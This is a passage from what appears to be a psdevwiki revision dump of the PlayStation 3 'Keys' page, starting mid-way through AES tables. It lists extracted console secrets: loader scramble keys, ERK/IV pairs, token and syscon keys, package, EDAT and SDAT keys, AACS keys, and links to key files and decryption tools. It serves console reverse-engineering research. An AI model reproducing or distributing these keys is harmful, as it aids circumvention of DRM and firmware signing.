0E 0F 10 11 12 13 14 15<br /> 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16<br /> 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17<br /> 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18<br /> 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19<br /> 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A<br /> 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B<br /> 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C<br /> 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D<br /> 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E<br /> 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F<br /> <br /> == ShiftRows tab ==<br /> 00 05 0A 0F 04 09 0E 03 08 0D 02 07 0C 01 06 0B<br /> 05 0A 0F 00 09 0E 03 04 0D 02 07 08 01 06 0B 0C<br /> 0A 0F 00 05 0E 03 04 09 02 07 08 0D 06 0B 0C 01<br /> 0F 00 05 0A 03 04 09 0E 07 08 0D 02 0B 0C 01 06<br /> <br /> == InvShiftRows tab ==<br /> 00 0D 0A 07 04 01 0E 0B 08 05 02 0F 0C 09 06 03<br /> 0D 0A 07 00 01 0E 0B 04 05 02 0F 08 09 06 03 0C<br /> 0A 07 00 0D 0E 0B 04 01 02 0F 08 05 06 03 0C 09<br /> 07 00 0D 0A 0B 04 01 0E 0F 08 05 02 03 0C 09 06<br /> <br /> == Td0/Te1 ==<br /> <br /> See [[https://invgen.googlecode.com/git-history/53549121c5b903c31cbae01b0cfeaa985035a4a5/Benchmarks/aes/aes_orig/aes_orig_hex2dec.py this]] and [[http://psdevwiki.com/ps3/AES_binaries binaries]] with sbox repeated 4 times<br /> <br /> == T5 ==<br /> Inside lv2_kernel<br /> see [[https://github.com/cforler/Ada-Crypto-Library/blob/master/src/crypto-symmetric-algorithm-aes-tables.ads this ]]<br /> <br /> {{Reverse engineering}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Keys&diff=43775 Keys 2017-03-31T09:44:40Z <p>Mathieulh: /* Arcade Master Key */ (sysdbg has nothing to do with arcade)</p> <hr /> <div>[http://www.youtube.com/watch?v=wo19Y4tw0l8 Illegal Numbers - Numberphile]<br /> <br /> = Keys Notes =<br /> You can download the keys from: [http://www.ps3devwiki.com/files/devtools/ps3keys/ ps3keys] (or for scetool here : [http://www.ps3devwiki.com/files/devtools/scetool/data/ scetool/data/])<br /> &lt;!--// [https://github.com/search?utf8=%E2%9C%93&amp;q=PS3keys&amp;repo=&amp;langOverride=&amp;start_value=1&amp;type=Repositories&amp;language= ''ps3keys at Github''] / http://www.mirrorcreator.com/files/JSM2FRCD/ps3keys.exe_links [http://www.ps3devwiki.com/files/firmware/MFW-CEX/PS3MFWBuilder/ps3keys.exe ''ps3keys in RAR sfx (254.01 KB)''] / [http://www.mirrorcreator.com/files/EVWOWZES/ps3keys.zip_links ps3keys.zip (229.9 KB)] //--&gt;<br /> <br /> == Location ==<br /> keyfiles should be placed in ~/.ps3 or %userprofile%\ps3keys &lt;br /&gt;<br /> <br /> == Naming ==<br /> naming:<br /> * file prefix: lv0, lv1, lv2, app, iso, ldr, pkg, spp, np<br /> : (NB: some tools use np- others drm-, or npdrm- prefix, uniform naming in all tools is adviced)<br /> * file suffix: .092 .315 .341 .350 .355 .356<br /> : (NB: actually 080, 092, 240, 340, 350, 355, 356, 360, 365, 370 ...)<br /> * key file (erk): %s-key-%s<br /> * iv file (riv): %s-iv-%s<br /> * ctype file (curvetype): %s-ctype-%s<br /> * pub file (public): %s-pub-%s<br /> * priv file (private): %s-priv-%s<br /> <br /> == Key Table Structure==<br /> === generic in loaders ===<br /> Keys are kept in tables and indexed by the sdk_type in the SELF header.<br /> struct key_obj {<br /> uint8_t key[0x20];<br /> uint8_t iv[0x10];<br /> uint8_t pub[0x28];<br /> uint32_t curve_type;<br /> uint32_t always_zero?; // most likely padding: keys must be 16 byte aligned for the crypto routines<br /> }<br /> <br /> === appldr specific ===<br /> typedef struct _appldr_key_container<br /> {<br /> /* start-end (length) */<br /> u8 key[32]; /* 0x00-0x19 (0x20) */ (AES:ERK - 256bit Encryption Round Key) */<br /> u8 iv[16]; /* 0x20-0x2f (0x10) */ (AES:RIV - 128bit Reset Initialization Vector) */<br /> u8 pub[40]; /* 0x30-0x57 (0x28) */ (ECDSA:public - 320bit) */<br /> u32 ctype; /* 0x58-0x5b (0x04) */ (ECDSA:curvetype - 32bit formatted 8bit value) */<br /> u32 null; /* 0x5c-0x5f (0x04) */ (always zero - 32bit formatted) */<br /> /* 0x00-0x5f (0x60) */ (total per revision/type entry - 768bit) */<br /> } appldrKeyContainer;<br /> <br /> appldrKeyContainer rev0x00_0x0c_1[13];<br /> <br /> appldrKeyContainer rev0x00_0x0c_2[13];<br /> <br /> appldrKeyContainer unknown;<br /> <br /> appldrKeyContainer npdrm_1[13];<br /> appldrKeyContainer npdrm_2[13];<br /> <br /> appldrKeyContainer revoke;<br /> <br /> = Curves Notes =<br /> * first &quot;curve&quot; (type 00) is probably reserved (and cannot be used because it's an invalid curve that serves no purpose since it's fully zeroed)<br /> * second curve is ONLY used in kirk CMD 1 parameters (which means that some of the keys/curves from psp were ported to ps3)<br /> * third curve is the most widely used curve and serves the general use purpose<br /> <br /> = Key Scrambling =<br /> Starting with firmware version 3.60 loader keys have been encrypted. Look [http://www.sendspace.com/file/mx21uz here] for a tool that decrypts them.<br /> Besides that, [http://www.sendspace.com/file/ykermj there is] an implementation of the cryptographic algorithm which is used to encrypt/decrypt lv1ldr from lv0 and root scramble key at the SPU side. <br /> <br /> == Root scramble keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! type !! version !! key<br /> |-<br /> | root || 3.60-3.61 || &lt;code&gt;844F80F3C57C455C7F09&lt;/code&gt;<br /> |-<br /> | root || 3.65-3.66 || &lt;code&gt;865128F745845947A0CE&lt;/code&gt;<br /> |-<br /> | root || 3.7x || &lt;code&gt;0DAD161222CDDB00A631&lt;/code&gt;<br /> |-<br /> | root || 4.00-4.1x || &lt;code&gt;D029857926C7A918D48E&lt;/code&gt;<br /> |-<br /> | root || 4.20-4.80 || &lt;code&gt;F5FD0DFD54B738FC8895&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Scramble keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! type !! version !! key1 !! iv1 !! key2 !! iv2<br /> |-<br /> | isoldr || 3.60 || &lt;code&gt;5389A6DFA8567D43A80DA6DAB90EE946&lt;/code&gt; || &lt;code&gt;A51A2C7960AC1BE43AA0FB7695094188&lt;/code&gt; || &lt;code&gt;212E7E92FF1FB75AE5C1323037C34693&lt;/code&gt; || &lt;code&gt;90AF09A666BB0C663BF2FC8E5338B7B8&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65 || &lt;code&gt;E37A763FD7A559CFD7E1E2DA5C8CBAC4&lt;/code&gt; || &lt;code&gt;198361A904E748381CB9AA1DF5CCAB17&lt;/code&gt; || &lt;code&gt;23EAD00FC78D9A8B7785EB600124238C&lt;/code&gt; || &lt;code&gt;61B0D045DF5727EFC19E5BE53BE70F14&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70 || &lt;code&gt;9FD83EA32E9EAA0EF54AD0CFBB60D1DF&lt;/code&gt; || &lt;code&gt;194B649CDA9F4D814CD119C603E49FB5&lt;/code&gt; || &lt;code&gt;A9709BE3E8043BA24635A2617541E9D5&lt;/code&gt; || &lt;code&gt;F06A5B2FEF9CA87B1759DC53AEE1A3B5&lt;/code&gt;<br /> |-<br /> | isoldr || 4.11 || &lt;code&gt;FFD6342FC86B81F0E56C6867D618D72A&lt;/code&gt; || &lt;code&gt;A51A2C7960AC1BE43AA0FB7695094188&lt;/code&gt; || &lt;code&gt;194922A1EEB01E614884A44D1D7B7FC1&lt;/code&gt; || &lt;code&gt;90AF09A666BB0C663BF2FC8E5338B7B8&lt;/code&gt;<br /> |-<br /> | isoldr || 4.21 || &lt;code&gt;4DEA657828657CA86AB93E2162592B97&lt;/code&gt; || &lt;code&gt;EEB72FC7E42544C460E78EA30C72D211&lt;/code&gt; || &lt;code&gt;CE2D1A7AA4F4434058F0C8A64400CBF5&lt;/code&gt; || &lt;code&gt;852CC5C6C5D3B7EEB1801147B32E8D21&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60 || &lt;code&gt;F92C8666EFFBAC7EB583E54A257F7C05&lt;/code&gt; || &lt;code&gt;F2E70BC4BAC10C3D8DDBB7DC23053F9A&lt;/code&gt; || &lt;code&gt;DDF6A5B143C1141FEED01CDA719705C3&lt;/code&gt; || &lt;code&gt;018E695C3A29AF6E746A73CBF73DBDFD&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.65 || &lt;code&gt;546DE455AB15F33546D2296C2535FA44&lt;/code&gt; || &lt;code&gt;ACA9C00DA6D778A95EBD9D76E659C14F&lt;/code&gt; || &lt;code&gt;AB82EF1F62CC382CF2880A870499AE89&lt;/code&gt; || &lt;code&gt;6ECB2AC4DA8D400F0167F1EB9FD8D7F1&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.70 || &lt;code&gt;F98E56F3CB0D68797E3D81F0BE36CFBD&lt;/code&gt; || &lt;code&gt;7DA5A5487AFA3032BF49D40CEBEC2480&lt;/code&gt; || &lt;code&gt;7EAFED452D621269CB7EF46D7BE3DAD9&lt;/code&gt; || &lt;code&gt;A5C6E2A25C2DD09D6597F69EEB3A2CE5&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.11 || &lt;code&gt;80863EDBAE50DD4B16125FC9321BBC24&lt;/code&gt; || &lt;code&gt;1A9E31FEBD603A9CBE4ECD6026292466&lt;/code&gt; || &lt;code&gt;D4E2AA7293192CB1600D537A9E832F2D&lt;/code&gt; || &lt;code&gt;4503E4E505A773C55E0B8E1332341287&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.21 || &lt;code&gt;AC19D5DB427351434DC6DA3BD6E3DE6C&lt;/code&gt; || &lt;code&gt;66E68237D5B7228AA2F057B6043768E1&lt;/code&gt; || &lt;code&gt;466CD2F735628B8EF99D1793063BBB3B&lt;/code&gt; || &lt;code&gt;761907BA41A7945028D8FD8305B25BD2&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60 || &lt;code&gt;A25E7F097B2FC7B1082032C4387DB335&lt;/code&gt; || &lt;code&gt;0655809B26DF5F29E4E740D950A8CB53&lt;/code&gt; || &lt;code&gt;6B97507247CD680FE56D9E19D06DFC71&lt;/code&gt; || &lt;code&gt;B72B9DBB5C2CC74EB75C7B9815DBD5D8&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65 || &lt;code&gt;4B973A45A23894CBF0CDFC168B7EFB31&lt;/code&gt; || &lt;code&gt;2210B3103E7EDFD8CE0B25551B1D4003&lt;/code&gt; || &lt;code&gt;858CFE093654E3EFA16FCCE5F73C9591&lt;/code&gt; || &lt;code&gt;481472B4DF63EA5F883DAA2872EE5D2F&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70 || &lt;code&gt;85AEC67CB85BD04D3E7D3D76AA604FF5&lt;/code&gt; || &lt;code&gt;51B40C084A81C9BE35108FFC0C008F64&lt;/code&gt; || &lt;code&gt;616004C6C2D614737106FE41668826A7&lt;/code&gt; || &lt;code&gt;A765A845AAB477EABFEF4274ADA6AF04&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.11 || &lt;code&gt;020397E6D292288F80659F06E2DACEFB&lt;/code&gt; || &lt;code&gt;4CC9A8A9EED889070F066EC9A7CADA2B&lt;/code&gt; || &lt;code&gt;577BA1CBF1FD40A3EF53C9B5DAC3AC60&lt;/code&gt; || &lt;code&gt;B64BF3D04FBB3F8D29F9E63A97DF3DA9&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.21 || &lt;code&gt;872D02292EE7ED3544AFF20EEA5E6F0C&lt;/code&gt; || &lt;code&gt;2E0CBBD250150410302F7E8B33039EF3&lt;/code&gt; || &lt;code&gt;A02BA1F74446E4BAE04AF5CF13D94154&lt;/code&gt; || &lt;code&gt;2009879EED2F443367C80B62F9D1748F&lt;/code&gt;<br /> |-<br /> | appldr || 3.60 || &lt;code&gt;EE409F8CD0B7F8AF17769D5F6D67EA3F&lt;/code&gt; || &lt;code&gt;6BF7B2D5B0ED87EF4CF601D53EEA111A&lt;/code&gt; || &lt;code&gt;2149690206DD0ABC0CD5367C4AF2C810&lt;/code&gt; || &lt;code&gt;39D8E32CF3F1558902247F733D5284BF&lt;/code&gt;<br /> |-<br /> | appldr || 3.65 || &lt;code&gt;D1FF8A1B7AD27A186B0F1E2FFF5C2B65&lt;/code&gt; || &lt;code&gt;4D5EC61604BCE8250E62600376061878&lt;/code&gt; || &lt;code&gt;8F40C9F3CEF5284F5F432BD906ECDF24&lt;/code&gt; || &lt;code&gt;0B107F57C095B31EF15B95FFEC5134B2&lt;/code&gt;<br /> |-<br /> | appldr || 3.70 || &lt;code&gt;2AF91823CE38598E8D66245F698AB572&lt;/code&gt; || &lt;code&gt;D1A74E3DED98145F023F07FFB60D2B1D&lt;/code&gt; || &lt;code&gt;04BE8DD318D3E7454A166296B022F88D&lt;/code&gt; || &lt;code&gt;16D3B1E7B007FDFE101C029B5F39C761&lt;/code&gt;<br /> |-<br /> | appldr || 4.11 || &lt;code&gt;6BFAFA124D4B88841BCB861364C32826&lt;/code&gt; || &lt;code&gt;3F7679B0A1430C490C1F249EAA468D2C&lt;/code&gt; || &lt;code&gt;4338700B5FA64276DD3E57806ED679FD&lt;/code&gt; || &lt;code&gt;CFCAE1AF6F98E5651CBB021D78DD8F1B&lt;/code&gt;<br /> |-<br /> | appldr || 4.21 || &lt;code&gt;AAF65A91EC372C690969090F59E53C3E&lt;/code&gt; || &lt;code&gt;A5798C254313BC5416951E24EAD3C985&lt;/code&gt; || &lt;code&gt;66BCB417D14A2B592640801C11B7B49B&lt;/code&gt; || &lt;code&gt;2FF236152A4776DAD39B509244E8F5C2&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Scrambled keysets ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Type !! Version !! ERK || RIV<br /> |-<br /> | rvk_prg || 3.60 || &lt;code&gt;FB9CC7277F95F77E63618488AE38DB9C5226D988AF79CC4C0F49EC983FDC96D4&lt;/code&gt; || &lt;code&gt;E06DC9567BE0EA09D5D1A5355B996FC6&lt;/code&gt;<br /> |-<br /> | rvk_prg || 4.21 || &lt;code&gt;1FAED95E0BAB4BD4F9CAF9F9C0DAB5EBEFFB6CDAD6482ABF60DD73B0EA3FD0E8&lt;/code&gt; || &lt;code&gt;30B9F738238A015014A44DD57B3A1661&lt;/code&gt;<br /> |-<br /> | isoldr || 3.60 || &lt;code&gt;7CFE82A405C29EBE20BBA96BB1D1F6E9F31A01BF179018BE26F079808361ECF1&lt;/code&gt; || &lt;code&gt;B3E9683977AE89DE9AFFE6330774505C&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65 || &lt;code&gt;1626B646CC8A8198DAC725CF616C442D855A1E3FBD5824BA9AA36F5FBC345CA0&lt;/code&gt; || &lt;code&gt;2E691E3343A55B99E8A935B0443BD67B&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70 || &lt;code&gt;7DA7D447D0FD4088FFF2B858A266FEFECB3D2E79D68BCC0A70FF8B381258EFA7&lt;/code&gt; || &lt;code&gt;E46F02FDCA9F40CC5CD715D930190FE0&lt;/code&gt;<br /> |-<br /> | isoldr || 4.11 || &lt;code&gt;B2306998F30DEF6750E01674BCA38D46F8FAD1548B456C4F7869296F7DC27E83&lt;/code&gt; || &lt;code&gt;2912F5FC4C4FF400940B369193303D16&lt;/code&gt;<br /> |-<br /> | isoldr || 4.21 || &lt;code&gt;A4609638DC47355D6D7915F26E3837A1A02528AA7A1A27542231997EB4F7143D&lt;/code&gt; || &lt;code&gt;36762D06A6F6FBFFE342D8853A3CD440&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60 || &lt;code&gt;18097966C3DE8A0D82BF956CB39FAF782295C6CA7F1E547AB30EDFD7EE5CB812&lt;/code&gt; || &lt;code&gt;9B32B20FA77280F1095EA13F1C2D5C99&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.21 || &lt;code&gt;189615862C02E6278760BA3A19C8BF0C176B6EDD491A40F2F3ED0091CEFA28C3&lt;/code&gt; || &lt;code&gt;E372B32F7E439D30AC6CEC68CA23D903&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60 || &lt;code&gt;451E4179EF01987D64EA48841DCA5AA7CB3D6ADB8D880F52DAEF543E654BAE3F&lt;/code&gt; || &lt;code&gt;E8831E56EF9FA4D8D4BF7A6E78025644&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65 || &lt;code&gt;2A0E7FD3DA4AC74D4AB2DD6AF36FED41CD5F50DECB7FC945F81A85460E141739&lt;/code&gt; || &lt;code&gt;FD9D731564C1D1F0A4258667100D1F17&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70 || &lt;code&gt;7E115E8C38BEA057858E97F670EB3E6E2B8FA04C059422CC9273EF12335679B4&lt;/code&gt; || &lt;code&gt;90A06C54C727844AB5300BB6AB54C537&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.11 || &lt;code&gt;ECFAC7BA2F1BFA198A834EBC25B4FBD47448764A6E79A200C26948141A26B794&lt;/code&gt; || &lt;code&gt;CF33BDA9F55C71BD9F38B31162FCB0E3&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.21 || &lt;code&gt;B0B020CE5DE730AEFCD3778273F0F91456EBCCE8F184FC257D37E0182D20D328&lt;/code&gt; || &lt;code&gt;2D4C6F9F0AAF26A728CA166D03449321&lt;/code&gt;<br /> |-<br /> | edat-key-0 || 4.21 || &lt;code&gt;270C4A349DE7A329BB04FD8642C43591&lt;/code&gt; || <br /> |-<br /> | edat-hash-0 || 4.21 || &lt;code&gt;25790BA9D671FB125E53F013B0F9862E&lt;/code&gt; || <br /> |-<br /> | edat-key-1 || 4.21 || &lt;code&gt;D1DF87B5C1471B360ACE21315A339C06&lt;/code&gt; || <br /> |-<br /> | edat-hash-1 || 4.21 || &lt;code&gt;6D4BF3D7245DB294B6C3F9E32AA57E79&lt;/code&gt; || <br /> |-<br /> |}<br /> <br /> = Key lists =<br /> <br /> == sc_iso module 060.013.r010 - 4.75 ==<br /> 0: <br /> 1: <br /> 2: D413B89663E1FE9F75143D3BB4565274 (060.013.r010 - 4.75)<br /> 2: 73636B65795F7365726965736B657900 (INTERNAL)<br /> 3: FA72CEEF59B4D2989F111913287F51C7 (060.013.r010 - 4.75)<br /> 3: 73636B65795F7365726965736B657932 (INTERNAL)<br /> 4: DAA4B9F2BC70B280A7B340FA0D04BA14 (095.001 - 3.56)<br /> 4: 29C194FFEC1FD14D4AAE006C32B35990 (3.60 - 4.75)<br /> 4: 73636B65795F666F725F6D6173746572 (INTERNAL)<br /> 5: <br /> see also: http://pastie.org/3130817 / http://pastie.org/10206783<br /> <br /> == sb_iso_spu_module 083.006.r010 / 1.02 ==<br /> 0: 8E73EE9994E8A11C12300C34DA92D07FD8636E434C8FCA02 &lt;- sb_iso_magic_px<br /> 1: 9D013CBE2D46368B4DB782FF2472ECE64237F3538827416E &lt;- sb_iso_fix2_px<br /> 2: 086998B739554A8022372B883465DE5F718FC15DEE636447 &lt;- sb_iso_fix1_px<br /> 3: 534740F254E3F83503BBD7DE9F091B67325F31A00C78F2A9 &lt;- sb_iso_magic_dx<br /> 4: B62AB069608519CC7F69FC16D673ED085998A24A40B06AFF &lt;- sb_iso_fix2_dx<br /> 5: 8094270BA87742F383F109F9C7D9E9755C4E343D81D2A3D9 &lt;- sb_iso_fix1_dx<br /> <br /> == sb_iso_spu_module 3.41 ==<br /> 6: C51272E64D9A15CA445CD2F3795C15B81B192C7AC15883F4<br /> 7: E618B3A4EC2789DAFC2ED2DFED75A93FA7B55AEA201278A4<br /> 8: D7C0AC46B1CD3E7345A0F0DAF921F6DDDA03A37905FBB17E<br /> 9: E3F22665AFC4E1C014A431241DBC0B69D5D66857D91E6B27<br /> A: 66866AF7489AE85ABF98A670AA27672E066E60D14D524121<br /> B: EB9706B9A75A48853BD4035ADE936E050E87E742D27A8609<br /> note: 1.02 contains 6 keys, 3.41 contains 12 keys (it also includes the 1.02 keys)<br /> <br /> <br /> == sv_iso_spu_module 095.001 - 3.55 ==<br /> key_0: EF4F6A107742E8448BC1F9D8F2481B31 //key_0 is an aes_cfb128 iv<br /> <br /> iv_0(giv): 2226928D44032F436AFD267E748B2393<br /> key_0_0(kms1): 126C6B5945370EEECA68262D02DD12D2 //key_0_0 is used with iv_0 to generate gen_key_0<br /> key_0_1(kms2): D9A20A79666C27D11032ACCF0D7FB501 //key_0_1 is used with iv_0 to generate gen_key_1<br /> <br /> key_1(Kwm): 7CDD0E02076EFE4599B1B82C359919B3 //key_1 is used with iv_0<br /> <br /> iv_1(ivs_aes): 3BD624020BD3F865E80B3F0CD6566DD0 //iv_1 is used with gen_key_0 and gen_key_1<br /> <br /> key_2(Kh): 380BCF0B53455B3C7817AB4FA3BA90ED //key_2 + iv_2 are used to generate something from the disk name (id?)<br /> iv_2(IVh): 69474772AF6FDAB342743AEFAA186287<br /> <br /> debug_disc_fallback: 67C0758CF4996FEF7E88F90CC6959D66 //this fallback is used if the disk name (id?) is 'PS3_L_DEBUG_DISC' (used on PS3 and PS4?)<br /> <br /> ivs_3des: E80B3F0CD6566DD0<br /> <br /> eid4_fallback_0x00 FF1471C135E4593D0D27F9CAA3795BD9<br /> eid4_fallback_0x10 DD38369F0175173CE32BEED051FD4EF3<br /> <br /> eid4_fallback keys added from this [http://www.ps3-hacks.org/ps3-scetool-friday-isolated-spu-poc-and-eidtool-wip-updates.html source]<br /> <br /> trivia(you can find these in the middle of the keys) http://pastebin.com/mWxb3Zxj<br /> <br /> == spu_token_processor ==<br /> 095.001 - 3.56:<br /> token-hmac: CC30C4229113DB25733553AFD06E8762B3729D9EFAA6D5F35A6F58BF38FF8B5F58A25BD9C9B50B01D1AB4028676968EAC7F88833B662935D7506A6B5E0F9D97A<br /> token-key: 341812376291371C8BC756FFFC611525403F95A8EF9D0C996482EEC216B562ED<br /> token-iv: E8663A69CD1A5C454A761E728C7C254E<br /> 3.60-{{latest}}:<br /> token-public: A55476C9E6DFB890FAAF5FBFFD961B649D0ABF1D0CD76000BD4B5F5AFE0AB87DCEA221E252A37404<br /> token-curve-type: 0x9<br /> <br /> 08x - ???{{SD}}<br /> token-hmac internal: 646AC0DF49C333626C15F9C7CCDAE62DD882FBD223647AF41776E14D35984538CC525636330272EF7F26D883FB7041B44C2925485F9570F04DA2D18B7DA4CF1B<br /> token-key internal: 8801A471102853DC867247974B68F9361EAD861C3A09346FEF25FE36D15751CA<br /> token-iv internal: FEA685F720B0C60A65DC97B8B2C8BCB3<br /> <br /> == spu_utoken_processor 3.55 ==<br /> utoken-hmac: 572C987747A4A0A6A1E715963D0DCCCA28A8A94B5B529472EF1A4EFFEB2978F99BD0A9D42438DB731B443C9DC7944A13AC7B40FCA57DFE33D212FBA86CBEBCBA<br /> utoken-erk: D1CB1C81ACE35F3D970DDE723A622935516F98D0F0DB3E151DE2B7A2E34BD736<br /> utoken-iv: A6523E5426470953FE8C90F61BCA927A<br /> <br /> == sc_iso ==<br /> secure_com_lib_internal_key::BE_SC_PayloadKey: A3ADB99A21E47ADFF3FD7FC3173981CA # 060.013.r010 - {{latest}}<br /> secure_com_lib_internal_key::SC_BE_PayloadKey: 6933CEE7A518E5B8CBE1FC14B261B765 # 060.013.r010 - {{latest}}<br /> secure_com_lib_internal_key::FactoryInit_Password : 2EA267093B4556ED9D3BE62E115D6D59 # 060.013.r010 - 1.70<br /> sc_key::old_auth_key_1_0x00 : 13163A92B50513542C18ABAD31B85FB7<br /> sc_key::old_auth_key_2_0x00 : 2BC8BB73F4B59AC658A737A5DD535DFE<br /> sc_key::old_auth_key_1_0x01 : D6C374FCDFF8C3CF44018C78733BF5B2<br /> sc_key::old_auth_key_2_0x01 : 648B9FF94EF321C69A4AE596F2F08D22<br /> sc_key::old_auth_key_1_0x06 : 626C7124FC5BA1AF7436389BA37C6654<br /> sc_key::old_auth_key_2_0x06 : 9D94BE461CAF083C9D9FA185C93AEE7B<br /> sc_key::key_for_master : 73636B65795F666F725F6D6173746572<br /> sc_key::series_key : 73636B65795F7365726965736B657900<br /> sc_key::series_key2 : 73636B65795F7365726965736B657932<br /> <br /> == gpkg-key ==<br /> ps3_gpkg_key: 2E7B71D7C9C9A14EA3221F188828B8F8<br /> &lt;!--//u8 retail_pkg_aes_key[] = {0x2E,0x7B,0x71,0xD7,0xC9,0xC9,0xA1,0x4E,0xA3,0x22,0x1F,0x18,0x88,0x28,0xB8,0xF8};//--&gt;<br /> * Location: nas_plugin.sprx , from fw3.55cex: sub_36EEC, offset: 0x361F6@elf file.<br /> psp_gpkg_key: 07F2C68290B50D2C33818D709B60E62B<br /> * Location: nas_plugin.sprx , from fw3.55cex: sub_36EEC, offset: 0x3724A@elf file.<br /> <br /> == service mode dongle HMAC ==<br /> 46DCEAD317FE45D80923EB97E4956410D4CDB2C2<br /> <br /> == PUP HMAC ==<br /> F491AD94C6811096915FD5D24481AEDCEDEDBE6BE513724DD8F7B691E88A38F4B5162BFBECBE3A62185DD7C94DA2225ADA3FBFCE555B9EA9649829EB30CE8366<br /> <br /> == DAT ==<br /> dat-iv: 3032ADFCDE09CFBFF0A3B3525B097FAF<br /> dat-key: 2B7E151628AED2A6ABF7158809CF4F3C<br /> <br /> == EDAT ==<br /> edat-cypher-key-0: BE959CA8308DEFA2E5E180C63712A9AE<br /> edat-cypher-key-1: 4CA9C14B01C95309969BEC68AA0BC081<br /> edat-hasher-key-0: EFFE5BD1652EEBC11918CF7C04D4F011<br /> edat-hasher-key-1: 3D92699B705B073854D8FCC6C7672747<br /> <br /> == SDAT ==<br /> sdat-key: 0D655EF8E674A98AB8505CFA7D012933 (sdat-sha1: ED2A015EEB1BD0CE06D0447F1A22AF4C1C401E4A)<br /> <br /> == PS3 Minis ==<br /> ps3minis1: D6606A6B2499CBDA5FA09081C5CDBD8A (SHA1: F72D80C2386010667F8A75DEB026A011D5ABA570)<br /> ps3minis2: 625E777946626A37336E3A5D4A6B714B (SHA1: C218DAFEC53C8DEAAC9A9E3D2B9C1C6A48371F9F)<br /> <br /> Note: for minis iso.bin.edat<br /> <br /> == aim keys ==<br /> aim_ks_4 : 30B0395DC5835AAA3A7986B44AFAE684 &lt;- idps_magic10<br /> aim_ks_1 : 2ED7CE8D1D55454585BF6A3281CD03AF &lt;- idps_magic<br /> aim_iv : 51F78B72A64711CF5C72323FB8607A00 &lt;- magic_iv0<br /> aim_key : 922B198CDF0C07DCCE848B69882D804CC23F19C2EAE1244F35AF176F7FD37851 &lt;- magic_key0<br /> aim_compare : 401C4AA63B2C8D44E245F074DAE7782A 360D1E8EE2116BDF6F0D8A3CC17BE38F EA48B571F4D26DED0000000000000000 (1.00-3.42)<br /> http://pastie.org/2547291<br /> (ks version depends on the first four bytes of the eid) &lt;br /&gt;<br /> aim_compare-&gt;magic_0(note that there's magic_1 and magic_2 also on really old firmwares)<br /> <br /> == mode_auth_data == <br /> key : FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF<br /> iv : 0123456789ABCDEFFEDCBA9876543210<br /> hmac_key : 123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037<br /> F1482EA7EC578872F1482EA7EC578872F1482EA7EC578872F1482EA7EC578872<br /> magic : 52796F7461726F206973206375746521 (Ryotaro is cute!)<br /> http://pastie.org/4155189<br /> <br /> (Product Mode authentication data)<br /> <br /> == SYSCON_MANAGER_KEY ==<br /> <br /> D413B89663E1FE9F75143D3BB4565274<br /> <br /> [[Keys#sc_iso_module_1.00-4.00|sc_iso_module_1.00-4.00]]&lt;br /&gt;<br /> [http://www.ps3hax.net/showthread.php?t=68857&amp;p=721426 source]<br /> <br /> == AACS key/iv ==<br /> <br /> aes-256-ctr_key:<br /> 995FE3C3AB857BFCD853F1ABE796799D0E2093B2F7E094AE39CD88A2AC879F96<br /> aes-256-ctr iv:<br /> 802794556C7716719B40A175DB9A455E<br /> [[http://pastebin.com/kasHaXKp Another decrypted arrays with this key]]<br /> <br /> <br /> magic: FolkloreJam<br /> <br /> key:<br /> 2DC2DF39420321D0CEF1FE2374029D95<br /> iv:<br /> 0BA0F8DDFEA61FB3D8DF9F566A050F78<br /> <br /> new magic: CODEFACE<br /> <br /> public key 1 enc:<br /> 453C8B51307C4D15621C5D9D23D35BC3CE5F34136825B970130CFCCE0799F03D66004B25CF3EB6E2<br /> public key 1 dec:<br /> 63C21DFFB2B2798A13B58D61166C4E4AAC8A0772137EC638818FD98FA4C30B996728BF4B917F6A27<br /> public key 2 enc:<br /> 5EB2636DE15990A675AF74634DBFD2F48BD9802D7B468C231DADEAC26EB4B82B7EF900EE3193D122<br /> public key 2 dec:<br /> 784CF5C36397A4390406A49F7800C77DE90CB34C001DF36B8F2ECF83CDEE438F7FD1F4806FD20DE7<br /> public key 3 enc:<br /> 26FE96AE82CE349F71A9D0FC35BF158962D533617B5B7F4892832541A35AFBA40128F46E5E41DCC5<br /> public key 3 dec:<br /> 00000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> <br /> Curve:<br /> 